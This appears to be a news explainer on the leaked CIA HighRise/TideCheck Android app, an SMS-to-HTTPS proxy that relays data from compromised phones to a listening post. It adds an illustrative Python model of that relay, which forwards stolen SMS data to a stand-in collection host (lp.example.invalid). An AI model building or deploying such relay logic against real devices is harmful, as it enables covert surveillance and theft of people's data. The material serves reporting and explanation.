How CIA Highrise Project Works: Agents Covertly Steal Data From Hacked Smartphones (Without Internet)
Explained: How CIA Highrise Project Works
A couple of weeks ago WikiLeaks published the 16th batch of its ongoing Vault 7 leak (the CIA toolbox used for hacking). This time, instead of revealing new malware or a hacking tool, the whistleblower organisation unveiled how CIA operatives stealthily collect and forward stolen data from compromised smartphones.
Previously there have been reports about several CIA hacking tools, malware and implants used by the agency to remotely infiltrate and steal data from the targeted systems or smartphones.
However, this time neither WikiLeaks nor the leaked CIA manual clearly explains how agency operatives were using this tool in practice.
In general, malware uses the compromised machine's internet connection to send stolen data to an attacker-controlled server (a listening post). On smartphones, however, malware has an alternative channel for reaching the attackers: SMS.
Collecting stolen data via SMS creates its own problem, though: sorting and analysing bulk messages received from many different targeted devices.
To solve this issue, the CIA created a simple Android application, dubbed Highrise, which works as an SMS proxy between the compromised devices and the listening post server.
According to the manual, CIA operatives need to install an application called "TideCheck" on their own Android devices, which are set up to receive all the stolen data via SMS from the compromised devices.
The last known version of the TideCheck app, HighRise v2.0, was developed in 2013 and runs on devices with Android 4.0 to 4.3; by now the agency has presumably developed updated versions that work on newer Android releases.
Once installed, the app prompts for a password, which is "inshallah", and after login it displays three options:
- Initialize — to run the service.
- Show/Edit configuration — to configure basic settings, including the listening post server URL, which must use HTTPS.
- Send Message — lets the operative manually submit short messages (remarks) to the listening post server; this step is optional.
Once initialized and configured properly, the app runs continuously in the background, monitoring incoming SMS messages from compromised devices and forwarding every single message to the CIA's listening post server over a TLS-secured Internet channel.
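To make that data flow concrete, here is an added example, written in Python rather than the Android Java of the real app, and not code from the leaked HighRise/TideCheck tool: a minimal offline model of an SMS proxy that enforces the HTTPS-only listening post URL, forwards one envelope per received SMS, tags operator remarks separately, and shows how the listening post can key the collected messages by originating device. Every class name, the JSON envelope fields, the listening post URL and the sample messages are assumptions made for illustration; the leaked manual does not document the app's real wire format.

```python
# Added example, not code from the leaked HighRise/TideCheck app: a minimal,
# offline model of an SMS-to-HTTPS proxy of the kind the article describes.
# All names here (SmsMessage, ListeningPost, SmsProxy, the JSON envelope fields)
# are assumptions made for illustration; the leaked manual does not document
# the app's real wire format. The real tool is an Android app; this is Python.
import json
from dataclasses import dataclass
from datetime import datetime, timezone
from urllib.parse import urlparse


@dataclass(frozen=True)
class SmsMessage:
    """One inbound SMS as the proxy handset would receive it."""
    sender: str       # originating number, i.e. the compromised device
    body: str
    received_at: str  # ISO 8601 UTC timestamp


class ListeningPost:
    """Offline stand-in for the HTTPS listening post. It records every POSTed
    envelope and groups the bodies by source device, which is the bulk-sorting
    problem the article says HighRise was built to address."""

    def __init__(self):
        self.records = []

    def post(self, url: str, payload: bytes) -> None:
        self.records.append(json.loads(payload))

    def by_device(self) -> dict:
        grouped: dict = {}
        for rec in self.records:
            grouped.setdefault(rec["source"], []).append(rec["body"])
        return grouped


class SmsProxy:
    """Forwards each received SMS, one envelope per message, to the listening
    post. The transport is injected so the example runs without a network."""

    def __init__(self, listening_post_url: str, transport):
        self.url = self.check_url(listening_post_url)
        self.transport = transport
        self.forwarded = 0

    @staticmethod
    def check_url(url: str) -> str:
        # The manual says the listening post URL must use HTTPS; refuse anything else.
        parts = urlparse(url)
        if parts.scheme != "https" or not parts.netloc:
            raise ValueError(f"listening post URL must be https://..., got {url!r}")
        return url

    def _send(self, envelope: dict) -> None:
        self.transport.post(self.url, json.dumps(envelope).encode("utf-8"))
        self.forwarded += 1

    def on_sms(self, msg: SmsMessage) -> None:
        """Called for every SMS the handset receives; the equivalent of the
        background service described in the article."""
        self._send({"type": "sms", "source": msg.sender,
                    "received_at": msg.received_at, "body": msg.body})

    def send_remark(self, text: str) -> None:
        """The manual 'Send Message' option: an operator note, tagged so the
        listening post does not confuse it with exfiltrated data."""
        self._send({"type": "remark", "source": "operator",
                    "received_at": datetime.now(timezone.utc).isoformat(),
                    "body": text})


def accepts_url(url: str) -> bool:
    """True if the proxy would accept this listening post URL."""
    try:
        SmsProxy.check_url(url)
        return True
    except ValueError:
        return False


# Constructed sample traffic: two compromised handsets, interleaved as their
# messages would arrive at the proxy handset.
SAMPLE_SMS = [
    SmsMessage("+15550001", "loc=51.50,-0.12", "2013-06-01T10:00:00+00:00"),
    SmsMessage("+15550002", "contacts=3", "2013-06-01T10:00:05+00:00"),
    SmsMessage("+15550001", "battery=71%", "2013-06-01T10:00:09+00:00"),
]


def run_demo(listening_post_url: str = "https://lp.example.invalid/collect") -> dict:
    """Feed the sample traffic and one operator remark through the proxy and
    return what the listening post sees, grouped by source device."""
    lp = ListeningPost()
    proxy = SmsProxy(listening_post_url, lp)
    for sms in SAMPLE_SMS:
        proxy.on_sms(sms)
    proxy.send_remark("device 1 is the primary target")
    return lp.by_device()


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

On the real platform the inbound side would be an Android broadcast receiver for incoming SMS rather than a direct method call, and the transport would be an HTTPS client; the model's point is the forwarding logic, the per-message envelope and the HTTPS check, not the Android plumbing.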
Reference: https://thehackernews.com/2017/07/cia-smartphone-hacking-tool.html